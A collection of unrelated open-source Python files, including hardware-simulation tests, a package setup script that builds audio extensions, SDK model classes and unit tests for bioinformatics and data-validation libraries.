skip=cocotb.LANGUAGE in ["verilog"] or cocotb.SIM_NAME.lower().startswith("ghdl")
)
async def access_constant_string_vhdl(dut):
"""Access to a string, both constant and signal."""
constant_string = dut.isample_module1.EXAMPLE_STRING
assert isinstance(constant_string, ConstantObject)
assert constant_string.value == b"TESTING"
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_writing_string_undersized(dut):
test_string = b"cocotb"
dut.stream_in_string.setimmediatevalue(test_string)
assert dut.stream_out_string == b""
await Timer(1, "ns")
assert dut.stream_out_string.value == test_string
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_writing_string_oversized(dut):
test_string = b"longer_than_the_array"
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
assert dut.stream_out_string.value == test_string[: len(dut.stream_out_string)]
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_read_single_character(dut):
test_string = b"cocotb!!!"
idx = 3
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
# String is defined as string(1 to 8) so idx=3 will access the 3rd character
assert dut.stream_out_string[idx].value == test_string[idx - 1]
# GHDL discovers strings as vpiNetArray (gh-2584)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=TypeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def test_write_single_character(dut):
# set initial value
test_string = b"verilog0"
dut.stream_in_string.setimmediatevalue(test_string)
await Timer(1, "ns")
# iterate over each character handle and uppercase it
for c in dut.stream_in_string:
lowercase = chr(c)
uppercase = lowercase.upper()
uppercase_as_int = ord(uppercase)
c.setimmediatevalue(uppercase_as_int)
await Timer(1, "ns")
# test the output is uppercased
assert dut.stream_out_string.value == test_string.upper()
# TODO: add tests for Verilog "string_input_port" and "STRING_LOCALPARAM" (see issue #802)
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"] or cocotb.SIM_NAME.lower().startswith("riviera"),
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_const_string_verilog(dut):
"""Access to a const Verilog string."""
await Timer(10, "ns")
assert isinstance(dut.STRING_CONST, StringObject)
assert dut.STRING_CONST == b"TESTING_CONST"
dut.STRING_CONST.value = b"MODIFIED"
await Timer(10, "ns")
assert dut.STRING_CONST != b"TESTING_CONST"
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_var_string_verilog(dut):
"""Access to a var Verilog string."""
await Timer(10, "ns")
assert isinstance(dut.STRING_VAR, StringObject)
assert dut.STRING_VAR == b"TESTING_VAR"
dut.STRING_VAR.value = b"MODIFIED"
await Timer(10, "ns")
assert dut.STRING_VAR == b"MODIFIED"
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_constant_boolean(dut):
"""Test access to a constant boolean"""
assert isinstance(dut.isample_module1.EXAMPLE_BOOL, ConstantObject)
assert dut.isample_module1.EXAMPLE_BOOL.value == True # noqa
@cocotb.test(skip=cocotb.LANGUAGE in ["verilog"])
async def access_boolean(dut):
"""Test access to a boolean"""
with pytest.raises(IndexError):
dut.stream_in_bool[3]
assert len(dut.stream_in_bool) == 1
curr_val = dut.stream_in_bool.value
dut.stream_in_bool.setimmediatevalue(not curr_val)
await Timer(1, "ns")
assert curr_val != dut.stream_out_bool.value
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_internal_register_array(dut):
"""Test access to an internal register array"""
assert (
dut.register_array[0].value.binstr == "xxxxxxxx"
), "Failed to access internal register array value"
dut.register_array[1].setimmediatevalue(4)
await Timer(1, "ns")
assert (
dut.register_array[1].value == 4
), "Failed to set internal register array value"
@cocotb.test(
skip=cocotb.LANGUAGE in ["vhdl"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (),
)
async def access_gate(dut):
"""
Test access to a gate Object
"""
assert isinstance(dut.test_and_gate, HierarchyObject)
# GHDL is unable to access record types (gh-2591)
@cocotb.test(
skip=cocotb.LANGUAGE in ["verilog"],
expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (),
)
async def custom_type(dut):
"""
Test iteration over a custom type
"""
expected_sub = 84
expected_top = 4
count = 0
def _discover(obj):
iter_count = 0
for elem in obj:
iter_count += 1
iter_count += _discover(elem)
return iter_count
for sub in dut.cosLut:
sub_count = _discover(sub)
assert sub_count == expected_sub
count += 1
assert expected_top == count
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def type_check_verilog(dut):
"""
Test if types are recognized
"""
test_handles = [
(dut.stream_in_ready, "GPI_REGISTER"),
(dut.register_array, "GPI_ARRAY"),
(dut.temp, "GPI_REGISTER"),
(dut.and_output, "GPI_NET"),
(dut.stream_in_data, "GPI_NET"),
(dut.logic_b, "GPI_REGISTER"),
(dut.logic_c, "GPI_REGISTER"),
(dut.INT_PARAM, "GPI_INTEGER"),
(dut.REAL_PARAM, "GPI_REAL"),
(dut.STRING_PARAM, "GPI_STRING"),
]
if cocotb.SIM_NAME.lower().startswith("icarus"):
test_handles.append(
(dut.logic_a, "GPI_NET")
) # https://github.com/steveicarus/iverilog/issues/312
else:
test_handles.append((dut.logic_a, "GPI_REGISTER"))
for handle in test_handles:
assert handle[0]._type == handle[1]
|
setup.py | spokestack/spokestack-python | 139 | 12634812 | import os
import subprocess
import sys
from setuptools import Extension, find_packages, setup
from setuptools.command.build_py import build_py
try:
from numpy import get_include
except ImportError:
subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy==1.19.2"])
from numpy import get_include
try:
from Cython.Build import cythonize
except ImportError:
subprocess.check_call([sys.executable, "-m", "pip", "install", "Cython==0.29.22"])
from Cython.Build import cythonize
class CustomBuild(build_py): # type: ignore
"""Custom build command to build PortAudio."""
def run(self) -> None:
"""Custom run function that builds and installs PortAudio/PyAudio."""
if sys.platform == "mingw":
# build with MinGW for windows
command = ["./configure && make && make install"]
elif sys.platform in ["win32", "win64"]:
# win32/64 users should install the PyAudio wheel or Conda package
command = None
else:
# macos or linux
command = ["./configure && make"]
if command:
# build PortAudio with system specific command
subprocess.run(
command,
shell=True,
check=True,
cwd="spokestack/extensions/portaudio",
)
# install PyAudio after PortAudio has been built
subprocess.run(
[sys.executable, "-m", "pip", "install", "pyaudio"],
shell=True,
check=True,
)
# run the normal build process
build_py.run(self)
SOURCES = [
os.path.join("spokestack/extensions/webrtc", source)
for source in [
"filter_audio/other/complex_bit_reverse.c",
"filter_audio/other/complex_fft.c",
"filter_audio/other/copy_set_operations.c",
"filter_audio/other/cross_correlation.c",
"filter_audio/other/division_operations.c",
"filter_audio/other/dot_product_with_scale.c",
"filter_audio/other/downsample_fast.c",
"filter_audio/other/energy.c",
"filter_audio/other/get_scaling_square.c",
"filter_audio/other/min_max_operations.c",
"filter_audio/other/real_fft.c",
"filter_audio/other/resample_by_2.c",
"filter_audio/other/resample_by_2_internal.c",
"filter_audio/other/resample_fractional.c",
"filter_audio/other/resample_48khz.c",
"filter_audio/other/spl_init.c",
"filter_audio/other/spl_sqrt.c",
"filter_audio/other/spl_sqrt_floor.c",
"filter_audio/other/vector_scaling_operations.c",
"filter_audio/vad/vad_core.c",
"filter_audio/vad/vad_filterbank.c",
"filter_audio/vad/vad_gmm.c",
"filter_audio/vad/vad_sp.c",
"filter_audio/vad/webrtc_vad.c",
"filter_audio/agc/analog_agc.c",
"filter_audio/agc/digital_agc.c",
"filter_audio/ns/nsx_core.c",
"filter_audio/ns/nsx_core_c.c",
"filter_audio/ns/noise_suppression_x.c",
]
]
EXTENSIONS = [
Extension(
"spokestack.extensions.webrtc.agc",
["spokestack/extensions/webrtc/agc.pyx"] + SOURCES,
include_dirs=["filter_audio/agc/include/"],
),
Extension(
"spokestack.extensions.webrtc.nsx",
["spokestack/extensions/webrtc/nsx.pyx"] + SOURCES,
include_dirs=["filter_audio/ns/include/"],
),
Extension(
"spokestack.extensions.webrtc.vad",
["spokestack/extensions/webrtc/vad.pyx"] + SOURCES,
include_dirs=["filter_audio/agc/include/"],
),
]
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="spokestack",
version="0.0.23",
author="Spokestack",
author_email="<EMAIL>",
description="Spokestack Library for Python",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/spokestack/spokestack-python",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
setup_requires=["setuptools", "wheel", "numpy==1.19.2", "Cython>=0.29.22"],
install_requires=[
"numpy==1.19.2",
"Cython>=0.29.22",
"websocket_client",
"tokenizers",
"requests",
],
ext_modules=cythonize(EXTENSIONS),
include_dirs=[get_include()],
cmdclass={"build_py": CustomBuild},
zip_safe=False,
)
|
lightning_transformers/__init__.py | mariomeissner/lightning-transformers | 451 | 12634816 | """Root package info."""
import os
__ROOT_DIR__ = os.path.dirname(os.path.dirname(__file__))
__version__ = "0.1.0"
__author__ = "PyTorchLightning et al."
__author_email__ = "<EMAIL>"
__license__ = "Apache-2.0"
__copyright__ = f"Copyright (c) 2020-2020, {__author__}."
__homepage__ = "https://github.com/PyTorchLightning/lightning-transformers"
__docs__ = "PyTorch Lightning Transformers."
__long_doc__ = """
Flexible interface for high performance research using SOTA Transformers leveraging PyTorch Lightning,
Transformers, and Hydra.
Transformers are increasingly popular for SOTA deep learning, gaining traction in NLP with BeRT based architectures
more recently transcending into the world of Computer Vision and Audio Processing.
However, training and fine-tuning transformers at scale is not trivial and can vary from domain to domain requiring
additional research effort, and significant engineering.
Lightning Transformers gives researchers a way to train HuggingFace Transformer models with all the features
of PyTorch Lightning, while leveraging Hydra to provide composability of blocks and configs to focus on research.
"""
|
alipay/aop/api/domain/AlipayOverseasOpenPreorderCreateModel.py | antopen/alipay-sdk-python-all | 213 | 12634825 | <reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TuitionISVAgentInfoDTO import TuitionISVAgentInfoDTO
from alipay.aop.api.domain.TuitionISVPayerInfoDTO import TuitionISVPayerInfoDTO
from alipay.aop.api.domain.TuitionISVRequestPaymentInfoDTO import TuitionISVRequestPaymentInfoDTO
from alipay.aop.api.domain.TuitionISVStudentInfoDTO import TuitionISVStudentInfoDTO
class AlipayOverseasOpenPreorderCreateModel(object):
def __init__(self):
self._agent_info = None
self._finish_self_audit = None
self._payer_info = None
self._payment_info = None
self._pre_order_id = None
self._student_info = None
@property
def agent_info(self):
return self._agent_info
@agent_info.setter
def agent_info(self, value):
if isinstance(value, TuitionISVAgentInfoDTO):
self._agent_info = value
else:
self._agent_info = TuitionISVAgentInfoDTO.from_alipay_dict(value)
@property
def finish_self_audit(self):
return self._finish_self_audit
@finish_self_audit.setter
def finish_self_audit(self, value):
self._finish_self_audit = value
@property
def payer_info(self):
return self._payer_info
@payer_info.setter
def payer_info(self, value):
if isinstance(value, TuitionISVPayerInfoDTO):
self._payer_info = value
else:
self._payer_info = TuitionISVPayerInfoDTO.from_alipay_dict(value)
@property
def payment_info(self):
return self._payment_info
@payment_info.setter
def payment_info(self, value):
if isinstance(value, TuitionISVRequestPaymentInfoDTO):
self._payment_info = value
else:
self._payment_info = TuitionISVRequestPaymentInfoDTO.from_alipay_dict(value)
@property
def pre_order_id(self):
return self._pre_order_id
@pre_order_id.setter
def pre_order_id(self, value):
self._pre_order_id = value
@property
def student_info(self):
return self._student_info
@student_info.setter
def student_info(self, value):
if isinstance(value, TuitionISVStudentInfoDTO):
self._student_info = value
else:
self._student_info = TuitionISVStudentInfoDTO.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.agent_info:
if hasattr(self.agent_info, 'to_alipay_dict'):
params['agent_info'] = self.agent_info.to_alipay_dict()
else:
params['agent_info'] = self.agent_info
if self.finish_self_audit:
if hasattr(self.finish_self_audit, 'to_alipay_dict'):
params['finish_self_audit'] = self.finish_self_audit.to_alipay_dict()
else:
params['finish_self_audit'] = self.finish_self_audit
if self.payer_info:
if hasattr(self.payer_info, 'to_alipay_dict'):
params['payer_info'] = self.payer_info.to_alipay_dict()
else:
params['payer_info'] = self.payer_info
if self.payment_info:
if hasattr(self.payment_info, 'to_alipay_dict'):
params['payment_info'] = self.payment_info.to_alipay_dict()
else:
params['payment_info'] = self.payment_info
if self.pre_order_id:
if hasattr(self.pre_order_id, 'to_alipay_dict'):
params['pre_order_id'] = self.pre_order_id.to_alipay_dict()
else:
params['pre_order_id'] = self.pre_order_id
if self.student_info:
if hasattr(self.student_info, 'to_alipay_dict'):
params['student_info'] = self.student_info.to_alipay_dict()
else:
params['student_info'] = self.student_info
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOverseasOpenPreorderCreateModel()
if 'agent_info' in d:
o.agent_info = d['agent_info']
if 'finish_self_audit' in d:
o.finish_self_audit = d['finish_self_audit']
if 'payer_info' in d:
o.payer_info = d['payer_info']
if 'payment_info' in d:
o.payment_info = d['payment_info']
if 'pre_order_id' in d:
o.pre_order_id = d['pre_order_id']
if 'student_info' in d:
o.student_info = d['student_info']
return o
|
examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py | madanagopaltcomcast/pxCore | 2,151 | 12634829 | <filename>examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure binary is relinked when manifest settings are changed.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
import pywintypes
import win32api
import winerror
RT_MANIFEST = 24
class LoadLibrary(object):
"""Context manager for loading and releasing binaries in Windows.
Yields the handle of the binary loaded."""
def __init__(self, path):
self._path = path
self._handle = None
def __enter__(self):
self._handle = win32api.LoadLibrary(self._path)
return self._handle
def __exit__(self, type, value, traceback):
win32api.FreeLibrary(self._handle)
def extract_manifest(path, resource_name):
"""Reads manifest from |path| and returns it as a string.
Returns None is there is no such manifest."""
with LoadLibrary(path) as handle:
try:
return win32api.LoadResource(handle, RT_MANIFEST, resource_name)
except pywintypes.error as error:
if error.args[0] == winerror.ERROR_RESOURCE_DATA_NOT_FOUND:
return None
else:
raise
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
gyp_template = '''
{
'targets': [
{
'target_name': 'test_update_manifest',
'type': 'executable',
'sources': ['hello.cc'],
'msvs_settings': {
'VCLinkerTool': {
'EnableUAC': 'true',
'UACExecutionLevel': '%(uac_execution_level)d',
},
'VCManifestTool': {
'EmbedManifest': 'true',
'AdditionalManifestFiles': '%(additional_manifest_files)s',
},
},
},
],
}
'''
gypfile = 'update-manifest.gyp'
def WriteAndUpdate(uac_execution_level, additional_manifest_files, do_build):
with open(os.path.join(CHDIR, gypfile), 'wb') as f:
f.write(gyp_template % {
'uac_execution_level': uac_execution_level,
'additional_manifest_files': additional_manifest_files,
})
test.run_gyp(gypfile, chdir=CHDIR)
if do_build:
test.build(gypfile, chdir=CHDIR)
exe_file = test.built_file_path('test_update_manifest.exe', chdir=CHDIR)
return extract_manifest(exe_file, 1)
manifest = WriteAndUpdate(0, '', True)
test.fail_test('asInvoker' not in manifest)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' in manifest)
# Make sure that updating .gyp and regenerating doesn't cause a rebuild.
WriteAndUpdate(0, '', False)
test.up_to_date(gypfile, test.ALL, chdir=CHDIR)
# But make sure that changing a manifest property does cause a relink.
manifest = WriteAndUpdate(2, '', True)
test.fail_test('requireAdministrator' not in manifest)
# Adding a manifest causes a rebuild.
manifest = WriteAndUpdate(2, 'extra.manifest', True)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' not in manifest)
|
systemdlogger/systemdlogger.py | techjacker/systemdlogger | 102 | 12634835 | #!/usr/bin/env python3
import argparse
from systemdlogger.runner import Runner
def main():
parser = argparse.ArgumentParser(
description=(
'Exports systemd logs to different storage backends'
', eg cloudwatch/elasticsearch.'
)
)
parser.add_argument(
'config',
type=str,
help='path to config file'
)
args = parser.parse_args()
runner = Runner(
config_path=args.config
)
runner.run()
if __name__ == '__main__':
main()
|
Tests/test_Align_nexus.py | lukasz-kozlowski/biopython | 2,856 | 12634848 | # Copyright 2021 by <NAME>. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for Bio.Align.nexus module."""
import unittest
from io import StringIO
from Bio.Align.nexus import AlignmentIterator, AlignmentWriter
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Install numpy if you want to use Bio.Align.nexus."
) from None
class TestNexusReading(unittest.TestCase):
def check_reading_writing(self, path):
alignments = AlignmentIterator(path)
stream = StringIO()
writer = AlignmentWriter(stream)
n = writer.write_file(alignments)
self.assertEqual(n, 1)
alignments = AlignmentIterator(path)
alignments = list(alignments)
alignment = alignments[0]
stream.seek(0)
saved_alignments = AlignmentIterator(stream)
saved_alignments = list(saved_alignments)
self.assertEqual(len(alignments), len(saved_alignments))
saved_alignment = saved_alignments[0]
for i, (sequence, saved_sequence) in enumerate(
zip(alignment.sequences, saved_alignment.sequences)
):
self.assertEqual(sequence.id, saved_sequence.id)
self.assertEqual(sequence.seq, saved_sequence.seq)
self.assertEqual(sequence.annotations, saved_sequence.annotations)
self.assertEqual(alignment[i], saved_alignment[i])
self.assertTrue(
numpy.array_equal(alignment.coordinates, saved_alignment.coordinates)
)
def test_nexus1(self):
path = "Nexus/test_Nexus_input.nex"
with open(path) as stream:
alignments = AlignmentIterator(stream)
alignments = list(alignments)
self.assertEqual(len(alignments), 1)
alignment = alignments[0]
self.assertEqual(len(alignment), 9)
self.assertEqual(alignment.shape, (9, 46))
self.assertEqual(alignment.sequences[0].id, "t1")
self.assertEqual(alignment.sequences[1].id, "t2 the name")
self.assertEqual(alignment.sequences[2].id, "isn'that [a] strange name?")
self.assertEqual(
alignment.sequences[3].id, "one should be punished, for (that)!"
)
self.assertEqual(alignment.sequences[4].id, "t5")
self.assertEqual(alignment.sequences[5].id, "t6")
self.assertEqual(alignment.sequences[6].id, "t7")
self.assertEqual(alignment.sequences[7].id, "t8")
self.assertEqual(alignment.sequences[8].id, "t9")
self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[2].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[3].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[4].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[5].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[6].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[7].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[8].annotations, {"molecule_type": "DNA"})
self.assertEqual(
alignment.sequences[0].seq, "ACGTcgtgtgtgctctttacgtgtgtgctcttt"
)
self.assertEqual(alignment.sequences[1].seq, "ACGcTcgtgtctttacacgtgtcttt")
self.assertEqual(alignment.sequences[2].seq, "ACcGcTcgtgtgtgctacacacgtgtgtgct")
self.assertEqual(alignment.sequences[3].seq, "ACGT")
self.assertEqual(
alignment.sequences[4].seq, "AC?GT?acgt???????????acgt????????"
)
self.assertEqual(
alignment.sequences[5].seq, "AcCaGtTc?aaaaaaaaaaacgactac?aaaaaaaaaa"
)
self.assertEqual(
alignment.sequences[6].seq, "A?CGgTgggggggggggggg???gggggggggggggggg"
)
self.assertEqual(
alignment.sequences[7].seq, "AtCtGtTtttttttttttt??ttttttttttttttttttt??"
)
self.assertEqual(
alignment.sequences[8].seq, "cccccccccccccccccccNcccccccccccccccccccccNcc"
)
self.assertTrue(
numpy.array_equal(
alignment.coordinates,
numpy.array(
[
[
0,
1,
1,
2,
2,
3,
3,
4,
5,
6,
8,
12,
13,
14,
16,
16,
17,
17,
18,
18,
18,
18,
19,
20,
21,
23,
27,
28,
29,
31,
31,
32,
32,
33,
],
[
0,
1,
1,
2,
2,
3,
4,
5,
6,
7,
9,
9,
9,
10,
12,
12,
13,
13,
14,
14,
14,
16,
17,
18,
19,
21,
21,
21,
22,
24,
24,
25,
25,
26,
],
[
0,
1,
1,
2,
3,
4,
5,
6,
7,
8,
10,
14,
15,
16,
16,
16,
16,
16,
16,
16,
18,
20,
21,
22,
23,
25,
29,
30,
31,
31,
31,
31,
31,
31,
],
[
0,
1,
1,
2,
2,
3,
3,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
4,
],
[
0,
1,
1,
2,
3,
4,
4,
5,
6,
6,
8,
12,
12,
13,
15,
15,
16,
17,
18,
18,
20,
20,
20,
21,
21,
23,
27,
27,
28,
30,
30,
31,
32,
33,
],
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
9,
13,
14,
15,
17,
17,
18,
18,
19,
21,
23,
25,
26,
27,
28,
28,
32,
33,
34,
36,
36,
37,
37,
38,
],
[
0,
1,
2,
3,
3,
4,
5,
6,
7,
8,
10,
14,
15,
16,
18,
18,
19,
19,
20,
22,
22,
24,
25,
26,
27,
29,
33,
34,
35,
37,
37,
38,
38,
39,
],
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
11,
15,
16,
17,
19,
19,
20,
20,
21,
23,
25,
27,
28,
29,
30,
32,
36,
37,
38,
40,
40,
41,
41,
42,
],
[
0,
1,
2,
3,
4,
5,
6,
7,
8,
9,
11,
15,
16,
17,
19,
20,
21,
21,
22,
24,
26,
28,
29,
30,
31,
33,
37,
38,
39,
41,
42,
43,
43,
44,
],
]
),
)
)
self.assertEqual(
alignment[0],
"A-C-G-Tcgtgtgtgctct-t-t------acgtgtgtgctct-t-t",
)
self.assertEqual(
alignment[1],
"A-C-GcTcgtg-----tct-t-t----acacgtg-----tct-t-t",
)
self.assertEqual(alignment[2], "A-CcGcTcgtgtgtgct--------acacacgtgtgtgct------")
self.assertEqual(alignment[3], "A-C-G-T---------------------------------------")
self.assertEqual(alignment[4], "A-C?G-T?-acgt??-???-???--??---?-acgt??-???-???")
self.assertEqual(alignment[5], "AcCaGtTc?--aaaaaaaa-a-aacgactac?--aaaaaaaa-a-a")
self.assertEqual(alignment[6], "A?C-GgTgggggggggggg-g-g??--?gggggggggggggg-g-g")
self.assertEqual(alignment[7], "AtCtGtTtttttttttttt-?-?ttttttttttttttttttt-?-?")
self.assertEqual(alignment[8], "cccccccccccccccccccNc-ccccccccccccccccccccNc-c")
self.check_reading_writing(path)
def test_nexus2(self):
path = "Nexus/codonposset.nex"
with open(path) as stream:
alignments = AlignmentIterator(stream)
alignments = list(alignments)
self.assertEqual(len(alignments), 1)
alignment = alignments[0]
self.assertEqual(len(alignment), 2)
self.assertEqual(alignment.shape, (2, 22))
self.assertEqual(alignment.sequences[0].id, "Aegotheles")
self.assertEqual(alignment.sequences[1].id, "Aerodramus")
self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"})
self.assertEqual(alignment.sequences[0].seq, "AAAAAGGCATTGTGGTGGGAAT")
self.assertEqual(alignment.sequences[1].seq, "?????????TTGTGGTGGGAAT")
self.assertTrue(
numpy.array_equal(alignment.coordinates, numpy.array([[0, 22], [0, 22]]))
)
self.assertEqual(alignment[0], "AAAAAGGCATTGTGGTGGGAAT")
self.assertEqual(alignment[1], "?????????TTGTGGTGGGAAT")
self.check_reading_writing(path)
class TestNexusBasic(unittest.TestCase):
def test_empty(self):
import io
stream = io.StringIO()
with self.assertRaisesRegex(ValueError, "Empty file."):
AlignmentIterator(stream)
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
tests/checks/test_blank_row.py | jdaviscooke/goodtables-py | 243 | 12634871 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from goodtables.checks.blank_row import blank_row
import goodtables.cells
# Check
def test_check_blank_row(log):
cells = [
goodtables.cells.create_cell('name1', 'value', row_number=1),
]
errors = blank_row(cells)
assert log(errors) == []
assert len(cells) == 1
def test_check_blank_row_problem(log):
cells = [
goodtables.cells.create_cell('name1', '', row_number=1),
]
errors = blank_row(cells)
assert log(errors) == [
(1, None, 'blank-row'),
]
assert len(cells) == 0
|
robogym/robot/factories.py | 0xflotus/robogym | 288 | 12634882 | from typing import Callable, Optional
import numpy as np
from robogym.robot.robot_interface import ControlMode, RobotControlParameters
from robogym.robot.ur16e.mujoco.free_dof_tcp_arm import (
FreeDOFTcpArm,
FreeRollYawTcpArm,
FreeWristTcpArm,
)
from robogym.robot.ur16e.mujoco.simulation.base import ArmSimulationInterface
def build_tcp_controller(
robot_control_params: RobotControlParameters,
simulation: ArmSimulationInterface,
initial_qpos: Optional[np.ndarray],
autostep: bool = False,
) -> FreeDOFTcpArm:
"""
:param robot_control_params:
:param simulation: Solver simulation.
:param initial_qpos: Initial state for the solver robot.
:param autostep:
:return:
"""
assert robot_control_params.is_tcp_controlled()
robot_cls: Optional[Callable[..., FreeDOFTcpArm]] = None
if robot_control_params.control_mode is ControlMode.TCP_WRIST:
robot_cls = FreeWristTcpArm
elif robot_control_params.control_mode is ControlMode.TCP_ROLL_YAW:
robot_cls = FreeRollYawTcpArm
else:
raise ValueError("Unknown control mode for TCP.")
robot = robot_cls(
simulation=simulation,
initial_qpos=initial_qpos,
robot_control_params=robot_control_params,
autostep=autostep,
)
assert isinstance(robot, FreeDOFTcpArm)
return robot
|
modelchimp/models/__init__.py | samzer/modelchimp-server | 134 | 12634911 | from modelchimp.models.project import Project
from modelchimp.models.membership import Membership
from modelchimp.models.experiment import Experiment
from modelchimp.models.comment import Comment
from modelchimp.models.profile import Profile
from modelchimp.models.user import User
from modelchimp.models.invitation import Invitation
from modelchimp.models.experiment_image import ExperimentImage
from modelchimp.models.experiment_custom_object import ExperimentCustomObject
|
exercises/practice/dot-dsl/dot_dsl_test.py | Stigjb/python | 1,177 | 12634923 | import unittest
from dot_dsl import Graph, Node, Edge, NODE, EDGE, ATTR
class DotDslTest(unittest.TestCase):
def test_empty_graph(self):
g = Graph()
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_node(self):
g = Graph([
(NODE, "a", {})
])
self.assertEqual(g.nodes, [Node("a", {})])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_node_with_keywords(self):
g = Graph([
(NODE, "a", {"color": "green"})
])
self.assertEqual(g.nodes, [Node("a", {"color": "green"})])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {})
def test_graph_with_one_edge(self):
g = Graph([
(EDGE, "a", "b", {})
])
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [Edge("a", "b", {})])
self.assertEqual(g.attrs, {})
def test_graph_with_one_attribute(self):
g = Graph([
(ATTR, "foo", "1")
])
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {"foo": "1"})
def test_graph_with_attributes(self):
g = Graph([
(ATTR, "foo", "1"),
(ATTR, "title", "Testing Attrs"),
(NODE, "a", {"color": "green"}),
(NODE, "c", {}),
(NODE, "b", {"label": "Beta!"}),
(EDGE, "b", "c", {}),
(EDGE, "a", "b", {"color": "blue"}),
(ATTR, "bar", "true")
])
self.assertEqual(g.nodes, [Node("a", {"color": "green"}),
Node("c", {}),
Node("b", {"label": "Beta!"})])
self.assertEqual(g.edges, [Edge("b", "c", {}),
Edge("a", "b", {"color": "blue"})])
self.assertEqual(g.attrs, {
"foo": "1",
"title": "Testing Attrs",
"bar": "true"
})
def test_malformed_graph(self):
with self.assertRaises(TypeError) as err:
Graph(1)
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph data malformed")
with self.assertRaises(TypeError) as err:
Graph("problematic")
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph data malformed")
def test_malformed_graph_item(self):
with self.assertRaises(TypeError) as err:
Graph([()])
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph item incomplete")
with self.assertRaises(TypeError) as err:
Graph([(ATTR, )])
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph item incomplete")
def test_malformed_attr(self):
with self.assertRaises(ValueError) as err:
Graph([(ATTR, 1, 2, 3)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Attribute is malformed")
def test_malformed_node(self):
with self.assertRaises(ValueError) as err:
Graph([(NODE, 1, 2, 3)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Node is malformed")
def test_malformed_EDGE(self):
with self.assertRaises(ValueError) as err:
Graph([(EDGE, 1, 2)])
self.assertEqual(type(err.exception), ValueError)
